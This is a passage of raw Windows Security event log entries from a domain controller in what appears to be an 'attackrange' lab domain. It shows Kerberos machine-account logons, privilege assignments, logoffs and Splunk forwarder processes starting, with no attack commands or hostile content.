Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59973
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263697
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x749DA9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263703
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A34B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263702
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A3CC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59BF5E39-EF3C-C4F1-62B6-4D331A885FBB}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53023
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263701
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A34B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53022
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263700
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A31D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53021
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263699
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A304
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53020
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263706
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74A49B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263705
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74A49B
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 02:21:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263704
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A31D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:21:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263707
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x749DA9
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:21:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263708
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x74A3CC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:21:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263711
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74B140
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:21:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263710
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74B140
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51437
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:21:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263709
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74B140
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263713
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263712
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263714
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263715
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b54
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263716
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bf4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263718
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263717
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1660
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263724
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E148
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263723
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x74E148
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51446
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263722
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x74E148
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:22:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
